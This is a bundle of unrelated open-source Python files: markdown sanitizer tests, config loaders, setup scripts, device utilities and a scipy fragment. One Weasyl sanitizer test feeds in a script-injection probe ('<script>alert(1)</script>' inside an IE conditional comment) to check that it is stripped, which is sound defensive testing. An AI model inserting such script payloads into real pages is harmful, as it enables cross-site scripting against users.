libxml_xfail = pytest.mark.xfail(LIBXML_VERSION < (2, 9), reason='libxml2 too old to preserve whitespace')

# (input markup, expected rendered HTML fragment) pairs exercising the
# user-linking shorthands supported by libweasyl's markdown renderer.
user_linking_markdown_tests = [
    ('<~spam>', '<a href="/~spam">spam</a>'),
    ('<!spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'),
    ('',
     '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'
     '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"></a>'),
    ('<!~spam>', '<a href="/~spam" class="user-icon"><img src="/~spam/avatar" alt="spam"> <span>spam</span></a>'),
    ('', '<a href="/~example" class="user-icon"><img src="/~example/avatar"> <span>user image with alt text</span></a>'),
    ('<user:spam>', '<a href="/~spam">spam</a>'),
    ('[link](user:spam)', '<a href="/~spam">link</a>'),
    # External-site shorthands get rel="nofollow ugc".
    ('<fa:spam>', '<a href="https://www.furaffinity.net/user/spam" rel="nofollow ugc">spam</a>'),
    ('<da:spam>', '<a href="https://www.deviantart.com/spam" rel="nofollow ugc">spam</a>'),
    ('<ib:spam>', '<a href="https://inkbunny.net/spam" rel="nofollow ugc">spam</a>'),
    ('<sf:spam>', '<a href="https://spam.sofurry.com/" rel="nofollow ugc">spam</a>'),
]
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_basic_user_linking(target, expected):
    # Each shorthand on its own renders inside a single paragraph.
    assert markdown(target) == '<p>%s</p>\n' % (expected,)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_tag(target, expected):
    # Shorthands still render when nested inside an inline HTML element.
    assert markdown('<em>%s</em>' % (target,)) == '<p><em>%s</em></p>\n' % (expected,)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_tail(target, expected):
    # Shorthands render in an element's tail text (after the closing tag).
    assert markdown('<em>eggs</em>%s' % (target,)) == '<p><em>eggs</em>%s</p>\n' % (expected,)
@libxml_xfail
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tag(target, expected):
    # Two space-separated shorthands inside one element both render.
    assert markdown('<em>%s %s</em>' % (target, target)) == '<p><em>%s %s</em></p>\n' % (expected, expected)
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tag_with_more_text_between(target, expected):
    # Plain text between two shorthands in the same element is preserved.
    assert markdown('<em>%s spam %s</em>' % (target, target)) == '<p><em>%s spam %s</em></p>\n' % (expected, expected)
@libxml_xfail
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tail(target, expected):
    # Two space-separated shorthands in an element's tail both render.
    assert markdown('<em>eggs</em>%s %s' % (target, target)) == (
        '<p><em>eggs</em>%s %s</p>\n' % (expected, expected))
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_twice_in_tail_with_more_text_betweeen(target, expected):
    # Plain text between two shorthands in the tail is preserved.
    assert markdown('<em>eggs</em>%s spam %s' % (target, target)) == (
        '<p><em>eggs</em>%s spam %s</p>\n' % (expected, expected))
@pytest.mark.parametrize(('target', 'expected'), user_linking_markdown_tests)
def test_markdown_user_linking_in_markdown(target, expected):
    # User links inside Markdown emphasis are rewritten too.
    rendered = markdown('*%s*' % (target,))
    assert rendered == '<p><em>%s</em></p>\n' % (expected,)
def test_markdown_no_user_links_in_code():
    # Inside <code>, the user-link syntax is escaped, not linked.
    rendered = markdown('<code><~spam></code>')
    assert rendered == '<p><code>&lt;~spam&gt;</code></p>\n'
def test_markdown_no_user_links_in_pre():
    # Inside <pre>, the user-link syntax is escaped, not linked.
    rendered = markdown('<pre><~spam></pre>')
    assert rendered == '<pre><p>&lt;~spam&gt;</p></pre>\n'
def test_markdown_no_user_links_in_links():
    # Text already inside an anchor is not turned into a user link.
    rendered = markdown('<a><~spam></a>')
    assert rendered == '<p><a>&lt;~spam&gt;</a></p>\n'
def test_markdown_escaped_user_link():
    # A backslash-escaped user link renders as literal (escaped) text.
    rendered = markdown('\\\\<~spam>')
    assert rendered == '<p>&lt;~spam&gt;</p>\n'
def test_markdown_multi_element():
    # Blank-line-separated text becomes separate paragraphs.
    rendered = markdown('one\n\ntwo')
    assert rendered == '<p>one</p>\n\n<p>two</p>\n'
def test_markdown_user_linking_with_underscore():
    # Underscores are dropped from the href target but kept in the label.
    rendered = markdown('<~hello_world>')
    assert rendered == '<p><a href="/~helloworld">hello_world</a></p>\n'
def test_markdown_image_replacement():
    # A Markdown image is replaced by a plain link to its source URL.
    rendered = markdown('![example](http://example)')
    assert rendered == '<p><a href="http://example" rel="nofollow ugc">example</a></p>\n'
    # A raw <img> without a src degrades to a link with an empty href.
    rendered = markdown('<img alt="broken">')
    assert rendered == '<p><a href="">broken</a></p>\n'
def test_forum_whitelist():
    # Whitelisted forum links do not get the rel="nofollow ugc" attribute.
    rendered = markdown('https://forums.weasyl.com/foo')
    assert rendered == (
        '<p><a href="https://forums.weasyl.com/foo">https://forums.weasyl.com/foo</a></p>\n')
def test_markdown_no_autolink_in_html_link():
    # URL-like and e-mail-like text inside an existing link must not be
    # autolinked again; in a non-link tag (<b>) it still is.
    cases = [
        ('[https://foo.test/](https://bar.test/)',
         '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n'),
        ('[@foo@bar.test](https://baz.test/)',
         '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'),
        ('<a href="https://bar.test/">https://foo.test/</a>',
         '<p><a href="https://bar.test/" rel="nofollow ugc">https://foo.test/</a></p>\n'),
        ('<A href="https://baz.test/">@foo@bar.test</A>',
         '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'),
        ('<a href="https://baz.test/">@foo@bar.test</a>',
         '<p><a href="https://baz.test/" rel="nofollow ugc">@foo@bar.test</a></p>\n'),
        ('<b>https://foo.test/</b>',
         '<p><b><a href="https://foo.test/" rel="nofollow ugc">https://foo.test/</a></b></p>\n'),
        ('<b>@foo@bar.test</b>',
         '<p><b>@<a href="mailto:foo@bar.test">foo@bar.test</a></b></p>\n'),
    ]
    for source, expected in cases:
        assert markdown(source) == expected
def test_markdown_unordered_list():
    # Dashed items render as an unordered list.
    rendered = markdown('- five\n- six\n- seven')
    assert rendered == '<ul><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ul>'
def test_markdown_regular_ordered_list_start():
    # An ordered list starting at 1 still gets an explicit start attribute.
    rendered = markdown('1. five\n1. six\n1. seven')
    assert rendered == '<ol start="1"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>'
def test_markdown_respect_ordered_list_start():
    # The first item's number is preserved as the list's start attribute.
    rendered = markdown('5. five\n6. six\n7. seven')
    assert rendered == '<ol start="5"><li>five</li>\n<li>six</li>\n<li>seven</li>\n</ol>'
def test_markdown_strikethrough():
    # ~~text~~ renders as a <del> element.
    rendered = markdown(u"~~test~~")
    assert rendered == u"<p><del>test</del></p>\n"
@pytest.mark.parametrize(('target', 'expected'), [
    (u"[external](http://example.com/)", u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
    (u'<a href="http://example.com/">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
    (u'<a href="http://example.com/" rel="noreferrer">external</a>', u'<a href="http://example.com/" rel="nofollow ugc">external</a>'),
    (u"[external](//example.com/)", u'<a href="//example.com/" rel="nofollow ugc">external</a>'),
])
def test_markdown_external_link_noreferrer(target, expected):
    # External links always end up with rel="nofollow ugc", replacing any
    # rel attribute supplied by the author.
    rendered = markdown(target)
    assert rendered == u"<p>%s</p>\n" % (expected,)
# Cases for markdown_link: ((link text, URL), expected Markdown source).
# Square brackets in the link text must come out backslash-escaped.
markdown_link_tests = [
    (('spam', '/eggs'), '[spam](/eggs)'),
    ((']spam[', '/eggs'), r'[\]spam\[](/eggs)'),
    (('[[spam]', '/eggs'), r'[\[\[spam\]](/eggs)'),
]
@pytest.mark.parametrize(('target', 'expected'), markdown_link_tests)
def test_markdown_link(target, expected):
    # markdown_link(text, url) escapes bracket characters in the text.
    text, url = target
    assert markdown_link(text, url) == expected
def test_tag_stripping():
    # Disallowed tags are removed while their inner text is kept;
    # conditional comments (and their script payload) are dropped entirely.
    for source, expected in [
        (u"<button>text</button>", u"<p>text</p>\n"),
        (u"<button><button>text</button></button>", u"<p>text</p>\n"),
        (u"<!--[if IE]><script>alert(1)</script><![endif]-->", u"\n"),
    ]:
        assert markdown(source) == expected
markdown_excerpt_tests = [
(u'', u''),
(u'short', u'short'),
(u'just short enoughAAAAAAAAAAAAA', u'just short enoughAAAAAAAAAAAAA'),
(u'not short enoughAAAAAAAAAAAAAAA', u'not short enoughAAAAAAAAAAAAA…'),
(u'*leading* inline formatting', u'leading inline formatting'),
(u'middle *inline* formatting', u'middle inline formatting'),
(u'trailing inline *formatting*', u'trailing inline formatting'),
(u'*nested **inline** formatting*', u'nested inline formatting'),
(u' unnecessary whitespace\t', u'unnecessary whitespace'),
(u'multiple\nlines', u'multiple lines'),
(u'multiple \nlines', u'multiple lines'),
(u'multiple\n\nparagraphs', u'multiple paragraphs'),
(u'Üñíçôđe\N{COMBINING ACUTE ACCENT}', u'Üñíçôđe\N{COMBINING ACUTE ACCENT}'),
(u'single-codepoint graphemes😊😊😊😊', u'single-codepoint graphemes😊😊😊😊'),
(u'single-codepoint graphemes😊😊😊😊😊', u'single-codepoint graphemes😊😊😊…'),
(u'test\n - lists\n - of\n - items\n\ntest', u'test lists of items test'),
]
@pytest.mark.parametrize(('target', 'expected'), markdown_excerpt_tests)
def test_excerpt(target, expected):
    # Excerpts strip formatting and truncate at the requested length.
    excerpt = markdown_excerpt(target, length=30)
    assert excerpt == expected
def test_excerpt_default_length():
    # The default excerpt length is 300: exactly 300 characters pass
    # through unchanged, 301 truncate to 299 plus an ellipsis.
    exactly_limit = u'a' * 300
    assert markdown_excerpt(exactly_limit) == exactly_limit
    over_limit = u'a' * 301
    assert markdown_excerpt(over_limit) == u'a' * 299 + u'…'
|
Weasyl/weasyl
|
libweasyl/libweasyl/test/test_text.py
|
Python
|
apache-2.0
| 8,802
|
# vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2018-2021 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Access to the qutebrowser configuration."""
from typing import cast, Any, Optional

from PyQt5.QtCore import QUrl

from qutebrowser.config import config
#: Simplified access to config values using attribute access.
#: For example, to access the ``content.javascript.enabled`` setting,
#: you can do::
#:
#: if config.val.content.javascript.enabled:
#: ...
#:
#: This also supports setting configuration values::
#:
#: config.val.content.javascript.enabled = False
val = cast('config.ConfigContainer', None)
def get(name: str, url: Optional[QUrl] = None) -> Any:
    """Get a value from the config based on a string name.

    Args:
        name: The dotted option name, e.g. ``'content.javascript.enabled'``.
        url: Optional URL to resolve the setting for; passed through to
            ``config.instance.get``.

    Returns:
        The value of the config option.
    """
    # Fix: the parameter was annotated ``url: QUrl = None``; implicit
    # Optional from a None default is deprecated by PEP 484.
    return config.instance.get(name, url)
|
forkbong/qutebrowser
|
qutebrowser/api/config.py
|
Python
|
gpl-3.0
| 1,462
|
"""
Loads editquality config, mainly used as template parameters.
The responsibility of this process is to simplify the template's work and other
consumers, as much as possible.
"""
import glob
import os
import deep_merge
import yaml
def _load_yaml(path):
    """Load a single YAML file, making sure the handle is closed."""
    with open(path) as f:
        return yaml.safe_load(f)


def load_config(config_dir=None):
    """Load the editquality configuration from *config_dir*.

    Reads the model/wiki defaults, the manual wiki list, the globals and
    every per-wiki YAML file, then expands each wiki via populate_defaults().

    Fix: the original opened every file with bare ``open(...)`` and never
    closed the handles (resource leak / ResourceWarning).

    :param config_dir: directory containing the YAML configuration files
    :return: dict with keys "model_defaults", "wiki_defaults", "globals",
             "wikis" (sorted by name) and "wiki_names" (sorted)
    """
    model_defaults = _load_yaml(os.path.join(config_dir, "model_defaults.yaml"))
    wiki_defaults = _load_yaml(os.path.join(config_dir, "wiki_defaults.yaml"))
    manual_wikis = _load_yaml(os.path.join(config_dir, "manual_wikis.yaml"))
    # Named after the "globals" config key; avoids shadowing the builtin.
    globals_config = _load_yaml(os.path.join(config_dir, "globals.yaml"))

    all_files = sorted(glob.glob(config_dir + "/wikis/*.yaml"))
    wikis = [_load_yaml(path) for path in all_files]

    wiki_names = [wiki['name'] for wiki in wikis] + manual_wikis['manual_wikis']
    wiki_names.sort()

    config = {
        "model_defaults": model_defaults,
        "wiki_defaults": wiki_defaults,
        "globals": globals_config,
        "wikis": wikis,
        'wiki_names': wiki_names,
    }
    config = populate_defaults(config)
    config['wikis'].sort(key=lambda t: t['name'])
    return config
def load_wiki(wiki_config, config):
    """Expand a single wiki's configuration with the configured defaults.

    :param wiki_config: the raw per-wiki configuration dict
    :param config: the full config dict; provides "wiki_defaults" and
        "model_defaults"
    :return: the merged wiki configuration
    """
    # Merge in wiki defaults
    # (merge_lists=deep_merge.overwrite — presumably the wiki's own lists
    # replace the default lists rather than being concatenated; confirm
    # against the deep_merge package docs)
    wiki_config = deep_merge.merge({}, config["wiki_defaults"], wiki_config,
                                   merge_lists=deep_merge.overwrite)
    for model_name, model_config in wiki_config.get('models', {}).items():
        # Merge in model defaults
        model_config = deep_merge.merge(
            {}, config["model_defaults"], model_config)
        wiki_config['models'][model_name] = model_config
    return wiki_config
def populate_defaults(config):
    """Replace config["wikis"] with default-expanded entries (via load_wiki)
    and return the config."""
    config["wikis"] = [load_wiki(wiki_config, config)
                       for wiki_config in config["wikis"]]
    return config
|
wiki-ai/editquality
|
editquality/config.py
|
Python
|
mit
| 1,884
|
#!/usr/bin/env python
import io
import os
import os.path
import re
from setuptools import setup, find_packages
# FIXME: this information should come from the script itself...
# Project metadata consumed by setup() below.
__projectname__ = "suse-doc-style-checker"
__programname__ = "SUSE Documentation Style Checker"
# __version__ will be read from sdsc/__init__.py
__authors__ = "Stefan Knorr, Thomas Schraitle"
__license__ = "LGPL-2.1+"
__description__ = "checks a given DocBook XML file for stylistic errors"
# Absolute directory containing this setup.py; used to read files reliably
# regardless of the current working directory.
HERE = os.path.abspath(os.path.dirname(__file__))
def requires(filename):
    """Returns a list of all pip requirements

    :param filename: the Pip requirement file (usually 'requirements.txt')
    :return: list of modules
    :rtype: list
    """
    modules = []
    with open(filename, 'r') as pipreq:
        for raw_line in pipreq:
            requirement = raw_line.strip()
            # Skip blank lines and comments.
            if not requirement or requirement.startswith('#'):
                continue
            # TODO: '-r <other file>' include lines are currently kept as-is.
            modules.append(requirement)
    return modules
def read(*names, **kwargs):
    """Return the decoded contents of a file located relative to HERE.

    :param names: path components joined below the project root
    :param kwargs: ``encoding`` selects the text encoding (default "utf8")
    """
    encoding = kwargs.get("encoding", "utf8")
    full_path = os.path.join(HERE, *names)
    with io.open(full_path, encoding=encoding) as fp:
        return fp.read()
def find_version(*file_paths):
    """Read the __version__ string from the given file.

    :return: version string
    :rtype: str
    :raises RuntimeError: if no __version__ assignment can be found
    """
    contents = read(*file_paths)
    match = re.search(r"^__version__\s*=\s*['\"]([^'\"]*)['\"]",
                      contents, re.M)
    if match is None:
        raise RuntimeError("Unable to find version string.")
    return match.group(1)
setupdict = dict(
    name=__projectname__,
    # Versions should comply with PEP440. For a discussion on single-sourcing
    # the version across setup.py and the project code, see
    # http://python-packaging-user-guide.readthedocs.org/en/latest/single_source_version/
    version=find_version("src", "sdsc", "__init__.py"),  # __version__,
    description=__description__,
    long_description="Checks a given DocBook XML file for stylistic errors using check files written in XSLT",
    # The project's main homepage.
    # (fix: these previously used the non-canonical github.org domain)
    url='https://github.com/openSUSE/suse-doc-style-checker',
    download_url='https://github.com/openSUSE/suse-doc-style-checker/releases',
    # Author details
    author=__authors__,
    author_email='sknorr@suse.de',
    license=__license__,
    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        # How mature is this project? Common values are
        #   3 - Alpha
        #   4 - Beta
        #   5 - Production/Stable
        'Development Status :: 5 - Production/Stable',
        # Indicate who your project is intended for
        'Topic :: Documentation',
        'Topic :: Software Development :: Documentation',
        'Intended Audience :: Developers',
        # Pick your license as you wish (should match "license" above)
        'License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)',
        # Supported Python versions
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Programming Language :: Python :: 3.6',
        'Topic :: Utilities',
    ],
    keywords=["docbook5", "style", "style-checking"],
    # ----
    # Includes data files from MANIFEST.in
    #
    # See also:
    # http://stackoverflow.com/a/16576850
    # https://pythonhosted.org/setuptools/setuptools.html#including-data-files
    include_package_data=True,
    # You can just specify the packages manually here if your project is
    # simple. Or you can use find_packages().
    # toms: Check this — find_packages() excludes take fnmatch-style globs,
    # not regexes, so this pattern likely never matches anything.
    # (fix: raw string; '.+\.xml' triggers an invalid-escape warning on
    # modern Python while producing the same value)
    packages=find_packages('src', exclude=(r'.+\.xml',)),
    package_dir={'': 'src'},
    # List run-time dependencies here. These will be installed by pip when
    # your project is installed. For an analysis of "install_requires" vs pip's
    # requirements files see:
    # https://packaging.python.org/en/latest/requirements.html
    install_requires=requires('requirements.txt'),
    # To provide executable scripts, use entry points in preference to the
    # "scripts" keyword. Entry points provide cross-platform support and allow
    # pip to create the appropriate form of executable for the target platform.
    entry_points={
        'console_scripts': ['sdsc=sdsc.cli:main'],
    },
    # Required packages for using "setup.py test"
    setup_requires=['pytest-runner'],
    tests_require=['pytest', 'pytest-cov', 'pytest-catchlog'],
)

# Call it:
setup(**setupdict)

# EOF
|
tomschr/sdsc
|
setup.py
|
Python
|
lgpl-2.1
| 4,642
|
# Copyright (c) 2017 Huawei, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from conveyordashboard import dashboard
class ProjectLevelOverview(horizon.Panel):
    """Horizon panel for the project-level overview of the Conveyor dashboard."""
    # Displayed panel title (translatable) and its unique URL slug.
    name = _("Project Level")
    slug = 'overview_project'


# Make the panel available under the Conveyor dashboard.
dashboard.Conveyor.register(ProjectLevelOverview)
|
Hybrid-Cloud/conveyor-dashboard
|
conveyordashboard/overview_project/panel.py
|
Python
|
apache-2.0
| 878
|
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Editor of stop locations in GTFS feed.
#
# This is an extension of schedule_viewer.py, which allows editing
# of stop location usig drag'n'drop.
# You must provide a Google Maps API key.
#
# Usage:
# location_editor.py --key `cat key` --port 8765 --feed_filename feed.zip
import schedule_viewer
import transitfeed
class LocationEditorRequestHandler(schedule_viewer.ScheduleRequestHandler):
def handle_json_GET_setstoplocation(self, params):
schedule = self.server.schedule
stop_id = params.get('id', None)
lat = params.get('lat', -1)
lon = params.get('lng', -1)
stop = schedule.GetStop(stop_id)
if (stop is None):
msg = 'Stop with id=' + stop_id + 'not found.'
else:
stop.stop_lat = float(lat)
stop.stop_lon = float(lon)
msg = 'Location of ' + stop['stop_name'] + '(' + stop_id + ') set to ' + \
lat + 'x' + lon
print msg
return msg
def handle_json_GET_savedata(self, params):
schedule = self.server.schedule
if not self.server.feed_path:
msg = 'Feed path not defined'
else:
schedule.WriteGoogleTransitFeed(self.server.feed_path)
msg = 'Data saved to ' + self.server.feed_path
print msg
return msg
def AllowEditMode(self):
return True
# Start the schedule viewer web server using the editing-enabled handler.
if __name__ == '__main__':
  schedule_viewer.main(LocationEditorRequestHandler)
|
Censio/transitfeed
|
location_editor.py
|
Python
|
apache-2.0
| 1,943
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable-msg=C0103
# pylint: disable-msg=C0301
"""
View the status of a given xengine.
Created on Fri Jan 3 10:40:53 2014
@author: paulp
"""
import argparse
from casperfpga import utils
from casperfpga.casperfpga import CasperFpga
try:
import corr2
import os
except ImportError:
corr2 = None
os = None
# Command-line interface: host list (or corr2 config), which GbE core(s)
# to query, and whether to include ARP/CPU details in the output.
parser = argparse.ArgumentParser(
    description='Display TenGBE interface information '
                'about a MeerKAT fpga host.',
    formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
    '--hosts', dest='hosts', type=str, action='store', default='',
    help='comma-delimited list of hosts, or a corr2 config file')
parser.add_argument(
    '-c', '--core', dest='core', action='store', default='all', type=str,
    help='which core to query')
parser.add_argument(
    '--arp', dest='arp', action='store_true', default=False,
    help='print the ARP table')
parser.add_argument(
    '--cpu', dest='cpu', action='store_true', default=False,
    help='print the CPU details')
parser.add_argument(
    '--comms', dest='comms', action='store', default='katcp', type=str,
    help='katcp (default) or dcp?')
parser.add_argument(
    '--loglevel', dest='log_level', action='store', default='',
    help='log level to use, default None, options INFO, DEBUG, ERROR')
args = parser.parse_args()
# Configure logging if a level name was given on the command line.
if args.log_level != '':
    import logging
    log_level = args.log_level.strip()
    try:
        # Fix: resolve the level name with getattr() instead of eval()'ing
        # user-supplied text; 'logging.INFO' etc. resolve identically and a
        # bad name still raises AttributeError.
        logging.basicConfig(level=getattr(logging, log_level))
    except AttributeError:
        raise RuntimeError('No such log level: %s' % log_level)
# create the devices and connect to them
if args.hosts.strip() == '':
    # No hosts on the command line: fall back to the corr2 config pointed
    # to by the CORR2INI environment variable (if corr2 is available).
    if corr2 is None or 'CORR2INI' not in os.environ.keys():
        raise RuntimeError('No hosts given and no corr2 config found. '
                          'No hosts.')
    fpgas = corr2.utils.script_get_fpgas(args)
else:
    hosts = args.hosts.strip().replace(' ', '').split(',')
    if len(hosts) == 0:
        raise RuntimeError('No good carrying on without hosts.')
    fpgas = utils.threaded_create_fpgas_from_hosts(hosts)
# Fetch each FPGA's design information in parallel (the 15 is presumably a
# per-call timeout in seconds — confirm against casperfpga.utils).
utils.threaded_fpga_function(fpgas, 15, ('get_system_information', [], {}))
# Report how many GbE cores each host has; fail if a host has none.
for fpga in fpgas:
    numgbes = len(fpga.gbes)
    if numgbes < 1:
        # Fix: the hostname was passed as a second argument (logging-style)
        # and was never interpolated into the message.
        raise RuntimeWarning('Host %s has no gbe cores' % fpga.host)
    print('%s: found %i gbe core%s: %s' % (
        fpga.host, numgbes, '' if numgbes == 1 else 's', fpga.gbes.keys()))
# Print the details of the selected core(s) on every host.
for fpga in fpgas:
    if args.core == 'all':
        cores = fpga.gbes.names()
    else:
        cores = [args.core]
    print(50*'#')
    print('%s:' % fpga.host)
    print(50*'#')
    for core in cores:
        # refresh=True — presumably re-reads the core data from the FPGA
        # instead of using cached values; confirm against casperfpga docs.
        fpga.gbes[core].print_gbe_core_details(
            arp=args.arp, cpu=args.cpu, refresh=True)
# handle exits cleanly
utils.threaded_fpga_function(fpgas, 10, 'disconnect')
# end
|
ska-sa/casperfpga
|
scripts/casperfpga_tengbe_coreinfo.py
|
Python
|
gpl-2.0
| 2,880
|
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test suite for devices using file transfer functions."""
import hashlib
import os
from typing import Type
from gazoo_device.tests.functional_tests.utils import gdm_test_base
import immutabledict
from mobly import asserts
# Shell command templates run on the device under test.
_COMMANDS = immutabledict.immutabledict({
    "IS_WRITABLE_DIRECTORY": "test -d {path} && test -w {path}",
    "REMOVE_FILE": "rm {path}",
})
def file_sha256(src_file_path: str) -> str:
  """Calculate the SHA256 hash of the given file.

  Args:
    src_file_path: Path to the file to be hashed.

  Returns:
    SHA256 hash of the file in hex digest format.
  """
  digest = hashlib.sha256()
  with open(src_file_path, "rb") as src_file:
    # Read in 64 KiB chunks so large files are not loaded whole into memory.
    for chunk in iter(lambda: src_file.read(65536), b""):
      digest.update(chunk)
  return digest.hexdigest()
class FileTransferTestSuite(gdm_test_base.GDMTestBase):
  """Functional test suite for the file transfer capability."""

  @classmethod
  def is_applicable_to(cls, device_type: str,
                       device_class: Type[gdm_test_base.DeviceType],
                       device_name: str) -> bool:
    """Determine if this test suite can run on the given device."""
    # Only devices exposing the "file_transfer" capability are testable.
    return device_class.has_capabilities(["file_transfer"])

  @classmethod
  def requires_pairing(cls) -> bool:
    """Returns True if the device must be paired to run this test suite."""
    return False

  def setup_test(self):
    """Creates a text source file for transfer to the device."""
    super().setup_test()
    # A fresh source file is written under the test's log directory before
    # every test case.
    file_contents = "The quick brown dog jumps over the lazy fox\n"
    self.host_source_path = os.path.join(self.log_path,
                                         "file_transfer_source.txt")
    with open(self.host_source_path, "w") as open_file:
      open_file.write(file_contents)

  def test_file_transfer(self):
    """Tests sending a file to the device and receiving it."""
    received_file_name = "file_transfer_received.txt"
    device_dir = self._get_writable_directory()
    device_path = os.path.join(device_dir, received_file_name)
    # Round-trip: host -> device, then device -> host, then compare.
    self.device.file_transfer.send_file_to_device(self.host_source_path,
                                                  device_path)
    host_received_path = os.path.join(self.log_path, received_file_name)
    try:
      self.device.file_transfer.recv_file_from_device(device_path,
                                                      host_received_path)
      asserts.assert_true(
          os.path.exists(host_received_path),
          f"recv_file_from_device did not create {host_received_path}")
      with open(self.host_source_path) as source_file:
        with open(host_received_path) as received_file:
          asserts.assert_equal(source_file.read(), received_file.read(),
                               "Received file was not equal to the sent file")
    finally:
      # Always clean up the device-side copy, even if receiving failed.
      self.device.shell(_COMMANDS["REMOVE_FILE"].format(path=device_path))

  def _get_writable_directory(self) -> str:
    """Returns a writable directory on the device."""
    possible_dirs = [
        "/tmp",
    ]
    # Probe each candidate with a shell test; the first writable dir wins.
    for possible_dir in possible_dirs:
      _, return_code = self.device.shell(
          _COMMANDS["IS_WRITABLE_DIRECTORY"].format(path=possible_dir),
          include_return_code=True)
      if return_code == 0:
        return possible_dir
    asserts.fail("Failed to find a writable directory on the device. "
                 f"Known possible directories {possible_dirs} did not work. "
                 "Find an appropriate directory and add it to the list.")
if __name__ == "__main__":
gdm_test_base.main()
|
google/gazoo-device
|
gazoo_device/tests/functional_tests/file_transfer_test_suite.py
|
Python
|
apache-2.0
| 4,139
|
from __future__ import division, print_function, absolute_import
__docformat__ = "restructuredtext en"
__all__ = []
from numpy import asanyarray, asarray, asmatrix, array, matrix, zeros
from scipy.sparse.linalg.interface import aslinearoperator, LinearOperator, \
IdentityOperator
# Result type-code when combining two numpy dtype chars
# ('f' float32, 'd' float64, 'F' complex64, 'D' complex128):
# precision and complexness are both promoted upward.
_coerce_rules = {('f','f'):'f', ('f','d'):'d', ('f','F'):'F',
                 ('f','D'):'D', ('d','f'):'d', ('d','d'):'d',
                 ('d','F'):'D', ('d','D'):'D', ('F','f'):'F',
                 ('F','d'):'D', ('F','F'):'F', ('F','D'):'D',
                 ('D','f'):'D', ('D','d'):'D', ('D','F'):'D',
                 ('D','D'):'D'}
def coerce(x, y):
    """Return the common dtype char for *x* and *y*, treating any type
    code outside 'fdFD' as 'd' (double)."""
    x = x if x in 'fdFD' else 'd'
    y = y if y in 'fdFD' else 'd'
    return _coerce_rules[x, y]
def id(x):
    # Identity function, used below as the default (no-op) preconditioner
    # solve.  NOTE: shadows the builtin ``id`` within this module.
    return x
def make_system(A, M, x0, b):
    """Make a linear system Ax=b

    Parameters
    ----------
    A : LinearOperator
        sparse or dense matrix (or any valid input to aslinearoperator)
    M : {LinearOperator, Nones}
        preconditioner
        sparse or dense matrix (or any valid input to aslinearoperator)
    x0 : {array_like, None}
        initial guess to iterative method
    b : array_like
        right hand side

    Returns
    -------
    (A, M, x, b, postprocess)
        A : LinearOperator
            matrix of the linear system
        M : LinearOperator
            preconditioner
        x : rank 1 ndarray
            initial guess
        b : rank 1 ndarray
            right hand side
        postprocess : function
            converts the solution vector to the appropriate
            type and dimensions (e.g. (N,1) matrix)
    """
    # Keep the original object: it may carry psolve/rpsolve hooks that the
    # LinearOperator wrapper does not expose.
    A_ = A
    A = aslinearoperator(A)
    if A.shape[0] != A.shape[1]:
        raise ValueError('expected square matrix, but got shape=%s' % (A.shape,))
    N = A.shape[0]
    b = asanyarray(b)
    if not (b.shape == (N,1) or b.shape == (N,)):
        raise ValueError('A and b have incompatible dimensions')
    if b.dtype.char not in 'fdFD':
